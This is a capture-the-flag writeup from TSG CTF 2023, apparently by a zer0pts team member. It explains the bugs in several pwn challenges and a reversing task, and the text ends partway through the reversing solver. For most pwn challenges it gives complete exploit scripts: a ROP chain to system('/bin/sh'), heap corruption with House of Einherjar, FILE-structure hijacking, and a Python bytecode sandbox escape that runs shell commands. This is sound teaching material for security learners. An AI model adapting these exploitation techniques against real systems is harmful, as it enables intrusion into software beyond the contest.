CTFするぞ

I also write about things other than CTF

TSG CTF 2023 Writeup

I played TSG CTF 2023 as part of zer0pts and we placed 4th. Everyone loves TSG CTF.

Writeups from st98:

nanimokangaeteinai.hateblo.jp

[Pwn beginner-easy] converter (78 solves, 112pts)

The program converts a hex string into a Unicode string. The goal is to leak the flag stored in flag_buffer, which is placed right after utf8_bin, the buffer for the encoded UTF-8 bytes.

char utf32_hexstr[3][MAX_FLAG_CHARS * 8 + 1];
char utf8_bin[MAX_FLAG_CHARS * 4 + 1];
char flag_buffer[MAX_FLAG_CHARS + 1];

What we need is a buffer overflow in utf8_bin. The program writes the encoded bytes of each Unicode character one character at a time.

            if (i % 8 == 7) {
                utf8_ptr += c32rtomb(utf8_ptr, wc, &ps);
            } else {
                wc *= 16;
            }

I started the program under GDB and entered 41414141 as the hex string more or less at random. It turned out that c32rtomb returned 6, which is larger than the expected maximum character size (4).

So, I sent 41414141 repeatedly until the output overflowed into the flag buffer.
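
A return value of 6 is what the original 1-to-6-byte UTF-8 scheme (RFC 2279) produces for a 31-bit value like 0x41414141. The sketch below is a plain Python model of that scheme, not glibc's code; that glibc's c32rtomb follows it is my assumption based on the observed return value, and legacy_utf8_encode is a hypothetical helper name.

```python
def legacy_utf8_encode(cp: int) -> bytes:
    """Encode cp with the original 1-6 byte UTF-8 scheme (RFC 2279)."""
    if cp < 0x80:
        return bytes([cp])
    # (exclusive upper bound, total length, lead-byte marker)
    for limit, length, lead in (
        (0x800, 2, 0xC0),
        (0x10000, 3, 0xE0),
        (0x200000, 4, 0xF0),
        (0x4000000, 5, 0xF8),
        (0x80000000, 6, 0xFC),
    ):
        if cp < limit:
            # Lead byte carries the top bits, then 6 bits per continuation byte
            out = [lead | (cp >> (6 * (length - 1)))]
            for shift in range(6 * (length - 2), -1, -6):
                out.append(0x80 | ((cp >> shift) & 0x3F))
            return bytes(out)
    raise ValueError("value does not fit in 31 bits")

encoded = legacy_utf8_encode(0x41414141)
print(len(encoded), encoded.hex())
```

Six bytes per 8 hex digits is more than the four bytes per character that utf8_bin budgets for, so the write pointer runs past the end of the buffer.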

from ptrlib import *

#sock = Process("./chall")
sock = Socket("nc 34.146.195.242 40002")

sock.sendlineafter("> ", "41414141"*22)
sock.sendlineafter("> ", "")
sock.sendlineafter("> ", "")

sock.sh()

[Pwn beginner-easy] converter2 (26 solves, 91pts)

This challenge is a fixed version of the previous one. The source code is unchanged, but the linked C library is changed from glibc to musl libc.

Reading the implementation of c32rtomb in musl, it looks like the function never returns a value larger than 4. However, it returns -1 if it fails to encode the character.

Therefore, we can move the pointer out of bounds in the negative direction, where utf32_hexstr is located. So, the idea is to make utf8_ptr point near the end of utf32_hexstr[2] and write some data there. The end of our hex string is then overwritten by that data and the string becomes longer than expected, which causes a buffer overflow.
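
To make the pointer arithmetic concrete, here is a minimal Python model of `utf8_ptr += c32rtomb(...)`. The return-value table is my simplified reading of a musl-style encoder in a UTF-8 locale, and c32rtomb_ret / final_offset are hypothetical names; the 64-bit size_t is an assumption about the target.

```python
MASK64 = (1 << 64) - 1  # size_t is 64 bits (assumption: x86-64 target)

def c32rtomb_ret(wc: int) -> int:
    """Return value of a musl-style c32rtomb in a UTF-8 locale (simplified model)."""
    if wc < 0x80:
        return 1
    if wc < 0x800:
        return 2
    if wc < 0xD800 or 0xE000 <= wc < 0x10000:
        return 3
    if 0x10000 <= wc < 0x110000:
        return 4
    return MASK64  # (size_t)-1: invalid code point

def final_offset(hexstr: str) -> int:
    """Offset of utf8_ptr from utf8_bin after processing every 8-digit group."""
    ptr = 0
    for i in range(0, len(hexstr) - 7, 8):
        ptr = (ptr + c32rtomb_ret(int(hexstr[i:i + 8], 16))) & MASK64
    # Reinterpret the unsigned result as a signed 64-bit offset
    return ptr - (1 << 64) if ptr >> 63 else ptr

print(final_offset("ffffffff" * 0x16))
```

Each invalid code point such as ffffffff adds 2^64 - 1 to the pointer, which is the same as stepping back by one byte, so a run of them walks utf8_ptr backward toward utf32_hexstr.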

from ptrlib import *

#sock = Process("./chall")
#sock = Process("./test")
sock = Socket("nc 34.146.195.242 40004")

block = "000f9f8d"
sock.sendlineafter("> ", "")
payload = "ffffffff"*0x16
for c in block:
    payload += f"000000{ord(c):02x}"
sock.sendlineafter("> ", payload)
sock.sendafter("> ", block*31)

sock.sh()

First blood.

[Pwn beginner-med] BABA PWN GAME (9 solves, 290pts)

I usually don't like seeing games in pwn because, in most cases, they require us to write unnecessary "programming" such as solving SAT problems or using A* to find the shortest paths. However, this task was a bit different.

The bug lies in selecting the stage name, where a buffer overflow occurs due to improper usage of strcpy.

  // *** Step 2. Load the stage ***
  printf("DIFFICULTY? (easy/hard)\n");
  int i;
  for (i = 0; i < 63; i++) {
    char c = fgetc(stdin);
    if (c == '\n') break;
    if (c == '/' || c == '~') return 1; // no path traversal
    state.stage_name[i] = c;
  }
  strcpy(&state.stage_name[i], ".y");

More precisely, the character 'y' of the appended ".y" can be written into spawn_off.
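
The overflow can be replayed on a 66-byte model of the first two fields. This is only a sketch: it assumes a little-endian target with no padding between stage_name and spawn_off, it skips the '/' and '~' filter, and simulate_stage_name is a hypothetical helper.

```python
import struct

def simulate_stage_name(user_input: bytes) -> bytearray:
    """Replay the input loop and the strcpy on stage_name[64] + spawn_off."""
    mem = bytearray(64 + 2)   # char stage_name[64]; unsigned short spawn_off;
    i = 0
    while i < 63 and i < len(user_input):
        c = user_input[i]
        if c == ord("\n"):
            break
        mem[i] = c
        i += 1
    mem[i:i + 3] = b".y\x00"  # strcpy(&state.stage_name[i], ".y")
    return mem

payload = b"hard.y" + b"\x00" * (63 - len(b"hard.y"))
mem = simulate_stage_name(payload)
spawn_off = struct.unpack_from("<H", mem, 64)[0]
print(hex(spawn_off))
```

With 63 bytes and no newline, the loop ends at i = 63, so '.' lands in the last byte of stage_name and 'y' plus the terminator land in spawn_off. The embedded NUL after "hard.y" keeps the file name valid.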

struct GameState {
  // meta values
  char stage_name[64];
  unsigned short spawn_off;
  char history[HISTORY_MAX + 64];
  // stage data
  unsigned short stage[STAGE_H][STAGE_W];
  unsigned short is_push[CHR_NUM]; // you can push this object if you move into a cell with the object
  unsigned short is_stop[CHR_NUM]; // you cannot move into a cell with this object
  unsigned short is_you[CHR_NUM];  // you can controll this object with WASD keys
  unsigned short is_sink[CHR_NUM]; // all objects in a cell are destroyed when something come onto a cell with the object
  unsigned short is_open[CHR_NUM]; // when *open* and *shut* objects are in the same cell, both are destroyed
  unsigned short is_shut[CHR_NUM]; // when *open* and *shut* objects are in the same cell, both are destroyed
  unsigned short is_win[CHR_NUM];  // you will win if *you* enter a cell with the object
  unsigned char should_update[STAGE_H][STAGE_W];
} state;

This variable holds the initial position of the player. With the overwritten value, the initial position falls outside the stage, which allows us to move the player objects outside the field.

I'm too lazy to write up the rest because it's a puzzle rather than a pwnable. This time it's solvable because of the shape of the stage.

I'll just paste the solver script.

from ptrlib import *

def move(m):
    sock.sendlineafter("> ", m)

#sock = Process("./baba_pwn_game")
#sock = Process("./test")
sock = Socket("nc 34.146.195.242 10906")
payload  = b"hard.y"
payload += b"\x00"*(63 - len(payload))
sock.sendafter(")\n", payload)

# Set is_push[bit('S')]
# S: push
move(b"wdddddddssssssassssssaaaaas")
move(b"ddddd")

# Set is_push[bit('S')] and is_you[bit('S')]
# S: push / player
move(b"wds")

# Set is_push[bit('I')] and is_you[bit('I')]
# S: push / player, I: push / player
move(b"sddssddssssaassssssdds")
move(b"aassssssdds")

# Double push to the goal
move(b"ddswwd")

sock.sh()

[Pwn easy] sloader (39 solves, 152pts)

Wow.

#include <stdio.h>

int main(void) {
    char buf[16];
    scanf("%s", buf);
    return 0;
}

Although every security feature is enabled, the binary is run through a loader called "sloader."

GLOG_minloglevel=3 timeout --foreground -s 9 60s stdbuf -i0 -o0 -e0 ./sloader ./chall

After attaching a debugger to the program, it was obvious that this loader didn't randomize the base address. So, every address, including those of the program and the libraries, is fixed.

The second problem is the stack canary. However, when I caused a buffer overflow under the loader, __stack_chk_fail did nothing at all. It looks like this loader uses a custom library in which __stack_chk_fail is empty.

ggez

from ptrlib import *

#sock = Process("./start.sh")
#sock = Process(["./sloader", "./a.out"])
sock = Socket("nc 34.146.195.242 40001")

#0x1012c960
payload  = b"A"*0x28
payload += flat([
    0x10262172, # ret;
    0x10262171, # pop rdi; ret
    0x10270563, # /bin/sh
    0x1012c960, # system
], map=p64)
#input("> ")
sock.sendline(payload)

sock.sh()

First blood.

[Pwn easy-med] tinyfs (14 solves, 240pts)

The program imitates a file system, where we can store files and folders. One notable feature is the cache system in the directory, but I didn't use it.

The first bug is an out-of-bounds read of the folder name. The folder structure looks like the following.

struct MyFolder {
    char name[NAME_MAX + 1];
    struct MyFolder* parent;
    struct MyFile* files[CONTENT_MAX];
    struct MyFolder* folders[CONTENT_MAX];
};

Since strcpy can fill name completely and overflow into parent, name may end up with no NUL terminator. It means that printing the name also leaks the address stored in parent.

Similarly, there is another data leak. When allocating a folder structure, the program zero-clears the memory.
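
Here is a small Python model of that leak, under my own assumptions: the parent address is made up, only the first three fields of the structure are modelled, and read_c_string stands in for whatever the program uses to print the name.

```python
import struct

NAME_SIZE = 0x20  # NAME_MAX + 1 in the challenge source

def read_c_string(mem: bytes, offset: int = 0) -> bytes:
    """Return the bytes up to (not including) the first NUL, like printing %s."""
    return mem[offset:mem.index(b"\x00", offset)]

parent = 0x000055555555A2A0                 # hypothetical heap address
folder = bytearray(NAME_SIZE + 8 + 8)       # name[], parent, files[0]

copied = b"A" * 0x28 + b"\x00"              # what strcpy copies, terminator included
folder[:len(copied)] = copied               # strcpy(new_folder->name, name)
struct.pack_into("<Q", folder, NAME_SIZE, parent)  # new_folder->parent = pwd

printed = read_c_string(bytes(folder))
leaked = int.from_bytes(printed[NAME_SIZE:NAME_SIZE + 6], "little")
print(hex(leaked))
```

The printed name runs through all 0x20 bytes of name and continues into the six non-zero bytes of the pointer, which is why the exploit slices the received line at [0x20:0x26].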

    struct MyFolder* new_folder = (struct MyFolder*)malloc(sizeof(struct MyFolder));
    memset(new_folder, 0, sizeof(struct MyFolder));
    strcpy(new_folder->name, name);

However, it's not the case when allocating a file structure.

    struct MyFile* new_file = (struct MyFile*)malloc(sizeof(struct MyFile));
    strcpy(new_file->name, name);
    *file = new_file;

This means the file contents remain uninitialized, and we can leak leftover data such as heap or libc pointers.

Let's move to the main bug. I solved it with an unintended solution. The program is calling strcpy in several places.

...
    struct MyFolder* new_folder = (struct MyFolder*)malloc(sizeof(struct MyFolder));
    memset(new_folder, 0, sizeof(struct MyFolder));
    strcpy(new_folder->name, name);
    new_folder->parent = pwd;
    *folder = new_folder;
...
    struct MyFile* new_file = (struct MyFile*)malloc(sizeof(struct MyFile));
    strcpy(new_file->name, name);
    *file = new_file;

The usage here is invalid because name can be longer than the name field of the structure.

#define NAME_MAX 0x20 - 1
#define FILE_SIZE_MAX 0x100 - 1
#define PATH_MAX 0x30 - 1
#define CACHE_MAX 0x80
#define CONTENT_MAX 0x20
...
struct MyFolder {
    char name[NAME_MAX + 1];
    struct MyFolder* parent;
    struct MyFile* files[CONTENT_MAX];
    struct MyFolder* folders[CONTENT_MAX];
};
...
        char command[0x50];
        read_n(command, 0x50);

Those strcpys cause heap buffer overflows.

I was so stupid that I thought it was overflowing by only a single NULL byte. Therefore, I used House of Einherjar to consolidate chunks backward.

Once we can corrupt the heap, it's easy to create a fake folder which has a pointer to a fake file. This gives us AAR/AAW primitives.

from ptrlib import *

def mkdir(name):
    sock.sendlineafter("$ ", "mkdir " + name)
def touch(name):
    if isinstance(name, bytes):
        sock.sendlineafter("$ ", b"touch " + name)
    else:
        sock.sendlineafter("$ ", "touch " + name)
def cd(name):
    sock.sendlineafter("$ ", "cd " + name)
def rm(name):
    sock.sendlineafter("$ ", "rm " + name)
def ls():
    sock.sendlineafter("$ ", "ls")
def cat(name):
    sock.sendlineafter("$ ", "cat " + name)
def mod(name, data):
    if isinstance(name, bytes):
        sock.sendlineafter("$ ", b"mod " + name)
    else:
        sock.sendlineafter("$ ", "mod " + name)
    sock.sendlineafter("Write Here > ", data)
def exit():
    sock.sendlineafter("$ ", "exit")

"""
#libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6")
#sock = Process("./chall")
libc = ELF("./libc-2.37.so")
sock = Socket("localhost", 9937)
"""
libc = ELF("./libc-2.37.so")
sock = Socket("nc 34.146.195.242 31415")
#"""

# Leak heap address
mkdir("A"*0x28)
ls()
heap_base = u64(sock.recvline()[0x20:0x26]) - 0x2a0
logger.info("heap: " + hex(heap_base))

# Leak libc address
for i in range(13):
    touch(f"A{i}")
for i in range(12):
    rm(f"A{i}")
for i in range(8):
    touch(f"A{i}")
cat("A7")
libc.base = u64(sock.recvline()) - libc.main_arena() - 0x4c0

# Prepare padding
touch("XXXX")
touch("XXXXXXXX")
mkdir("A")
cd("A")
for i in range(19):
    mkdir(f"A{i}")
cd("..")
# Corrupt chunk size
touch("YYYY")
touch("ZZZZ")
touch("WWWW")
mkdir("AAAA")
rm("YYYY")
touch("Y"*0x28) # off-by-null

# Prepare prev_size
for i in range(5):
    rm("Y"*(0x28-i))
    touch("Y"*(0x27-i))
rm("Y"*0x23)
touch("Y"*0x21 + "0")
rm("Y"*0x21 + "0")
touch("Y"*0x20)

# Prepare fake chunk
payload  = b"\x00"*0xa0
payload += p64(0) + p64(0x3001) # chunk_size (Y's prev)
payload += p64(heap_base + 0x1130) + p64(heap_base + 0x1130)
payload += p64(heap_base + 0x1120) + p64(heap_base + 0x1120)
payload += p64(heap_base + 0x1120) + p64(heap_base + 0x1120)
mod("XXXX", payload)
payload  = b"\x00"*0xf0
payload += p64(0) + b"\x31" # chunk_size (Y's next)
mod("ZZZZ", payload)

# Fill tcache
for i in range(7):
    touch(f"B{i}")
    touch(f"C{i}")
    rm(f"B{i}")
    touch("B"*0x27 + f"{i}")
for i in range(7):
    rm(f"C{i}")

# Backward consolidation
rm("ZZZZ")

# Create fake directory
mkdir("neko")
payload  = p64(libc.symbol("_IO_2_1_stderr_"))
payload += p64(heap_base + 0x11c0 - 0x68)
payload += p64(libc.symbol("system"))
mod("", payload)

# Corrupt FILE
cd("neko")
fake_file = flat([
    0x3b01010101010101, u64(b"/bin;sh\0") - 0x4e8, # flags / rptr
    0, 0, # rend / rbase
    0, 1, # wbase / wptr
    0, 0, # wend / bbase
    0, 0, # bend / savebase
    0, 0, # backupbase / saveend
    0, 0, # marker / chain
], map=p64)
fake_file += p64(libc.symbol("system")) # __doallocate
fake_file += b'\x00' * (0x88 - len(fake_file))
fake_file += p64(libc.base + 0x1f8a30) # _IO_stdfile_2_lock
fake_file += b'\x00' * (0xa0 - len(fake_file))
fake_file += p64(heap_base + 0x11b8 - 0xe0) # wide_data
fake_file += b'\x00' * (0xc0 - len(fake_file))
fake_file += p64(heap_base + 0x880 + 8) # mode != 0
fake_file += b'\x00' * (0xd8 - len(fake_file))
fake_file += p64(libc.base + 0x1f3240 + 0x18 - 0x58)
fake_file += p64(heap_base + 0x880 + 0x18) # _wide_data->_wide_vtab
mod(p64(libc.symbol("_IO_2_1_stdout_") + 131), fake_file)

sock.sendline("exit")

sock.sh()

First blood.

[Pwn medium] ghost (3 solves, 428pts)

The program is written in Rust and is based on the PoC of a paper. Basically, there are two vectors sharing a single buffer: one is a std::Vec<String> and the other is a BrandedVec<String>.

BrandedVec has a member named max_index, which holds the largest index accessed so far.

The program imitates Twitter in which we can push tweets and pin one of them. Additionally, we can move the pinned tweet to older or newer places.

The bug occurs in move_pin_tweet, where the move takes place.

    fn move_pin_tweet(&mut self) {
        print_str("older[0] / newer[1] > ");
        let old_new = get_usize();
        print_str("size > ");
        let id = get_usize();

        if old_new == 1 {
            self.pinned = self
                .tweets
                .get_index(self.pinned + id)
                .expect("no such tweet");
        } else {
            self.pinned = self.pinned - id;
        }
        assert!(self.sanity_check());
    }

The index is calculated differently depending on the direction of the move. Subtraction and addition on BrandedIndex are defined in the following way:

impl<'id> std::ops::Sub<usize> for BrandedIndex<'id> {
    type Output = Self;

    fn sub(mut self, rhs: usize) -> Self::Output {
        self.idx -= rhs;
        self
    }
}

impl<'id> std::ops::Add<usize> for BrandedIndex<'id> {
    type Output = usize;

    fn add(self, rhs: usize) -> Self::Output {
        self.idx + rhs
    }
}

Sub returns a BrandedIndex value while Add returns a usize value. This is because we don't need to check max_index if we move the tweet to older places, where we know it's within the array size.

In debug builds, Rust panics when an integer overflow happens. In release builds, however, overflow checks are disabled by default and the arithmetic silently wraps around.

Therefore, if we feed a big value to the offset of the move, it may move the tweet in the opposite direction. More specifically, if we choose to move the tweet to older places and input 0xffffffff_ffffffff, it actually moves the index to newer places without checking the index. Then, BrandedIndex points to out-of-bounds.
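
The wrap-around is easy to check with a Python model of 64-bit unsigned subtraction. wrapping_sub is a hypothetical helper that mirrors what `self.idx -= rhs` does when overflow checks are off, assuming a 64-bit usize.

```python
USIZE_BITS = 64
MASK = (1 << USIZE_BITS) - 1

def wrapping_sub(idx: int, rhs: int) -> int:
    """Model of `self.idx -= rhs` on a 64-bit usize without overflow checks."""
    return (idx - rhs) & MASK

for idx in (0, 1, 5):
    print(idx, "->", wrapping_sub(idx, 0xFFFF_FFFF_FFFF_FFFF))
```

Subtracting 2^64 - 1 is the same as adding 1 modulo 2^64, so every such "move to older" request advances the pinned index by one.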

We need to be careful, however, because sanity_check always verifies that the index is below the current length of the vector.

    pub fn sanity_check(&self, index: BrandedIndex<'id>) -> bool {
        index.idx < self.inner.len()
    }

So, we have to exploit it by abusing uninitialized vector elements: the leftover of pop method.

The exploit is straightforward. I leaked libc and heap addresses from freed Strings. The feature to modify a string allows us to overwrite the tcache free-list link, which means we can allocate a chunk wherever we want.
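
Both the heap leak and the forged link rely on glibc's safe-linking, which stores `(pos >> 12) ^ ptr` in a freed chunk's next field, where pos is the address of that field. A minimal sketch with made-up addresses (heap_base and pos below are hypothetical, not values from the challenge):

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """Value glibc stores in the next field located at address pos."""
    return (pos >> 12) ^ ptr

def reveal_ptr(pos: int, stored: int) -> int:
    """Inverse of protect_ptr: recover the real next pointer."""
    return (pos >> 12) ^ stored

heap_base = 0x5555_5555_9000   # hypothetical, page-aligned
pos = heap_base + 0x2010       # hypothetical address of a freed chunk's next field

# The last chunk in a bin has next == NULL, so the stored value is just pos >> 12.
leak = protect_ptr(pos, 0)
print(hex(leak << 12))         # page that contains the freed chunk

# Forging a link to an arbitrary 16-byte aligned target
target = heap_base + 0x35a0
forged = protect_ptr(pos, target)
print(hex(reveal_ptr(pos, forged)))
```

This is why the script shifts the leaked value left by 12 bits to get a heap page, and why it XORs the target with a shifted heap address before writing it back.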

I first attempted to link the free list into _IO_2_1_stdout_. Rust does not use glibc's stdio at runtime, but _IO_cleanup is still called on exit. Although I wanted to abuse _IO_cleanup to hijack the execution flow, the program tries to free the fake chunk allocated on _IO_2_1_stdout_ before it exits, which crashes the program before it reaches the exit handlers.

I changed the strategy to allocate a fake chunk on Vec<String> buffer instead of _IO_2_1_stdout_, which is a safe place to free. Then, I got full control over the vector and could achieve AAR/AAW primitives.

from ptrlib import *

def post(message):
    sock.sendlineafter("> ", "1")
    sock.sendlineafter("> ", message)
def undo():
    sock.sendlineafter("> ", "2")
def pin(index):
    sock.sendlineafter("> ", "3")
    sock.sendlineafter("> ", index)
def show():
    sock.sendlineafter("> ", "4")
def modify(message):
    sock.sendlineafter("> ", "5")
    sock.sendlineafter("> ", message)
def move(forward, distance):
    sock.sendlineafter("> ", "6")
    if forward:
        sock.sendlineafter("] > ", "1")
    else:
        sock.sendlineafter("] > ", "0")
    sock.sendlineafter("size > ", distance)

libc = ELF("./libc.so.6")
#sock = Process("./ghost")
sock = Socket("nc 34.146.195.242 40007")

# Leak heap address
post(b"AAAA")
move(False, 0xffffffffffffffff)
undo()
show()
heap_base = (u64(sock.recvline()) << 12) - 0x2000
logger.info("heap = " + hex(heap_base))

# Leak libc address
for i in range(8):
    if i == 7:
        post(b"A"*0xf8 + p64(0x201))
    else:
        post(str(i)*0x100)
for i in range(8):
    undo()
show()
libc.base = u64(sock.recvline()[:8]) - libc.main_arena() - 0x60

# Corrupt tcache
post(b"X"*0x100)
post(b"Y"*0x100)
move(False, 0xffffffffffffffff)
undo()
undo()
target = heap_base + 0x35a0
modify(p64(target ^ ((heap_base + 0x2000) >> 12)))

# Corrupt Vec<String>
post(b"X"*0x100)
payload  = b"\x00"*0xe0
payload += p64(heap_base + 0x2f68 - 0x68)
payload += p64(libc.symbol("system"))
payload += b"\x00"*(0x100 - len(payload))
post(payload)

fake_vec  = b"A"*8 + p64(0x191)
fake_vec += p64(0x017) + p64(heap_base + 0x0ba0) + p64(0x017)
fake_vec += p64(0x101) + p64(heap_base + 0x2d70) + p64(0x101)
fake_vec += p64(0x101) + p64(libc.symbol("_IO_2_1_stderr_")) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2c60) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2f90) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3170) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3280) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3390) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x34a0) + p64(0x101)
fake_vec += b"A" * (0x100 - len(fake_vec))
post(fake_vec)

# Corrupt FILE
fake_file = flat([
    0x3b01010101010101, u64(b"/bin;sh\0") - 0x4e8, # flags / rptr
    0, 0, # rend / rbase
    0, 1, # wbase / wptr
    0, 0, # wend / bbase
    0, 0, # bend / savebase
    0, 0, # backupbase / saveend
    0, 0, # marker / chain
], map=p64)
fake_file += p64(libc.symbol("system")) # __doallocate
fake_file += b'\x00' * (0x88 - len(fake_file))
fake_file += p64(libc.base + 0x21ba70) # _IO_stdfile_2_lock
fake_file += b'\x00' * (0xa0 - len(fake_file))
fake_file += p64(heap_base + 0x2f60 - 0xe0) # wide_data
fake_file += b'\x00' * (0xc0 - len(fake_file))
fake_file += p64(heap_base + 0x880 + 8) # mode != 0
fake_file += b'\x00' * (0xd8 - len(fake_file))
fake_file += p64(libc.base + 0x2160c0 + 0x18 - 0x58)
fake_file += p64(heap_base + 0x880 + 0x18) # _wide_data->_wide_vtab
fake_file += b"A"*(0x100 - len(fake_file))
modify(fake_file)

# Restore heap
move(False, 0xffffffffffffffff)
fake_vec  = b"A"*8 + p64(0x191)
fake_vec += p64(0x017) + p64(heap_base + 0x0ba0) + p64(0x017)
fake_vec += p64(0x101) + p64(heap_base + 0x2d70) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2e80) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2c60) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2f90) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3170) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3280) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3390) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x34a0) + p64(0x101)
fake_vec += b"A" * (0x100 - len(fake_vec))
modify(fake_vec)

sock.sendlineafter("> ", "7")

sock.sh()

First blood.

[Pwn hard] bypy (4 solves, 393pts)

The following code is the core of this challenge.

def main():
    global __builtins__
    print("Give me your source: ")
    src = input()
    if len(src) > NMAX:
        print("too long")
        exit(-1)

    c = b64decode(src)
    code = loads(c)
    if not validator(code):
        print("invalid code")
        exit(-1)

    dummy.__code__ = code

    print(dummy())

We can assign an arbitrary code object to the __code__ attribute of an empty function. That is, we can create an arbitrary function with any opcodes.

However, the following check ensures that the code object has no names, constants, or variables.

def validator(c):
    if len(c.co_names) != 0:
        return False
    if len(c.co_consts) != 0:
        return False
    if len(c.co_cellvars) != 0:
        return False
    if len(c.co_freevars) != 0:
        return False
    if len(c.co_varnames) != 0:
        return False
    return True

A well-known fact about Python bytecode is that some opcodes do not implement out-of-bounds checking. This allows us to pick an object from outside the stack.
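
For reference, this is how a chain of EXTENDED_ARG prefixes builds up a 32-bit argument: each prefix contributes one byte, most significant first. The signed interpretation below assumes the interpreter keeps the argument in a 32-bit signed int, which I have not confirmed here; fold_oparg and as_int32 are hypothetical helpers.

```python
def fold_oparg(arg_bytes):
    """Combine EXTENDED_ARG bytes and the final argument byte, high byte first."""
    oparg = 0
    for b in arg_bytes:
        oparg = (oparg << 8) | b
    return oparg

def as_int32(value):
    """Reinterpret the low 32 bits of value as a signed integer."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value

# Three EXTENDED_ARG bytes followed by the LOAD_CONST argument byte
first = fold_oparg([0xFF, 0xEA, 0x58, 0xC3])
second = fold_oparg([0xFF, 0xE8, 0x99, 0xEF])
print(hex(first), as_int32(first))
print(hex(second), as_int32(second))
```

Under that assumption, a leading 0xff byte turns the index into a negative number, so the load reaches memory located before the constants tuple.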

I first tried to get breakpoint object and call it, but the function calls __import__ internally, which is deleted by the following code:

for key in ["eval", "exec", "__import__", "open"]:
    del __builtins__.__dict__[key]

So, I picked up exec object instead.

Looking for a class that gives access to the os module, I found a class named BuiltinImporter, which has a method named load_module. I could successfully load the os module and call system.

Here is the final exploit:

from ptrlib import *
from base64 import b64encode
from marshal import dumps
import opcode

"""
search -p builtin_exec
search -p <found - 8>
search -p <found - 0x10>
"""

CodeType = (lambda x: x).__code__.__class__
bytecode = bytes([
    opcode.opmap['RESUME'], 0,
    opcode.opmap['EXTENDED_ARG'], 0xff,
    opcode.opmap['EXTENDED_ARG'], 0xea,
    opcode.opmap['EXTENDED_ARG'], 0x58,
    opcode.opmap['LOAD_CONST'], 0xc3,
    opcode.opmap['EXTENDED_ARG'], 0xff,
    opcode.opmap['EXTENDED_ARG'], 0xe8,
    opcode.opmap['EXTENDED_ARG'], 0x99,
    opcode.opmap['LOAD_CONST'], 0xef,
    opcode.opmap['CALL'], 0,
    opcode.opmap['POP_TOP'], 0,
    opcode.opmap['RETURN_VALUE'], 0,
])
#code = "breakpoint()"
code = "list(filter(lambda m: m.__name__ == 'BuiltinImporter', ().__class__.__base__.__subclasses__()))[0]().load_module('os').system('cat flag*')"
#code = "().__class__.__base__.__subclasses__()[225]()._module.sys.modules['os'].system('cat /flag*')"
exp = CodeType(0,0,0,0,0,0,bytecode,(),(),(),code,"","",0,code.encode(),b"")
payload = dumps(exp)

"""
#sock = Process(["docker", "run", "--rm", "-i", "bypy", "/bin/bash"])
#sock.sendline("./start.sh")
sock = Socket("localhost", 40003)
"""
sock = Socket("nc 34.146.195.242 40003")
#"""
sock.sendlineafter("source: ", b64encode(payload))
sock.sh()

[Reversing beginner-easy] beginners_rev_2023

This is a straightforward reversing challenge in which the program encrypts our input and compares it with an encrypted flag. The algorithm is composed of 3 parts:

  1. Shift and xor encoder
  2. Some encryption
  3. Shift and xor encoder

The encoder is simple enough.

Shift and xor encoder

For each 8-byte block of the input, it shifts the value by 12 bits and XORs the result with the original value. This operation is reversible by restoring the original state starting from the highest bits. The same encoding algorithm is applied again after the encryption, and we can decode it in the same way.
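
As a compact sketch of why this is reversible, assume the encoder is `x ^ (x >> 12)` on a 64-bit value (the right shift is my assumption, inferred from the fact that decoding starts at the highest bits). The top 12 bits of the output are untouched, and each decoding round recovers 12 more bits.

```python
MASK64 = (1 << 64) - 1

def encode(x: int) -> int:
    """Assumed encoder: XOR the value with itself shifted right by 12 bits."""
    return (x ^ (x >> 12)) & MASK64

def decode(v: int) -> int:
    """Invert encode by fixing 12 more high bits per round."""
    x = v                  # top 12 bits are already correct
    for _ in range(5):     # 12 * (1 + 5) = 72 >= 64 bits recovered
        x = v ^ (x >> 12)
    return x

samples = [0, MASK64, 0x0123456789ABCDEF, int.from_bytes(b"TSGCTF{}", "little")]
for s in samples:
    print(hex(s), hex(encode(s)), decode(encode(s)) == s)
```

The loop is equivalent to peeling the value apart in 12-bit groups from the top, just written without explicit masks.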

The most important code is the encryption. Since the decompiled code of the encryption was hardly readable, I reverse engineered the initialization of the encryption context. While the code for initialization was also complicated, I realized that it's initializing an array of 0x100 elements.

Additionally, the initialization function takes a key and its size. The key is 2023TTSSGG2023!, which is 15 bytes. It implies that the encryption is not a block cipher, but likely a stream cipher.

I ran the program with x64dbg and dumped the memory as shown below.

The "context" of encryption after initialization

I calculated the S-box of RC4 with the same key, and it turned out that the values above were exactly the same as the S-box.
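
For readers who want to reproduce the comparison, here is textbook RC4 in plain Python. It is a generic sketch rather than the rc4 module imported in the solver, and rc4_ksa / rc4_crypt are names I made up.

```python
def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: returns the 256-entry S-box for key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s

def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt data (the operation is symmetric)."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

sbox = rc4_ksa(b"2023TTSSGG2023!")
print(bytes(sbox[:16]).hex())  # compare against the start of the dumped context
```

The S-box right after key scheduling is a permutation of 0..255 that depends only on the key, which makes it a convenient fingerprint for recognizing RC4 in a memory dump.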

from ptrlib import *
from rc4 import RC4

rc4 = RC4(b"2023TTSSGG2023!")

def rev_shift(v):
    a = (v & 0xfff0_0000_0000_0000) >> (64 - 12)
    b = (v & 0x000f_ff00_0000_0000) >> (64 - 24)
    c = (v & 0x0000_00ff_f000_0000) >> (64 - 36)
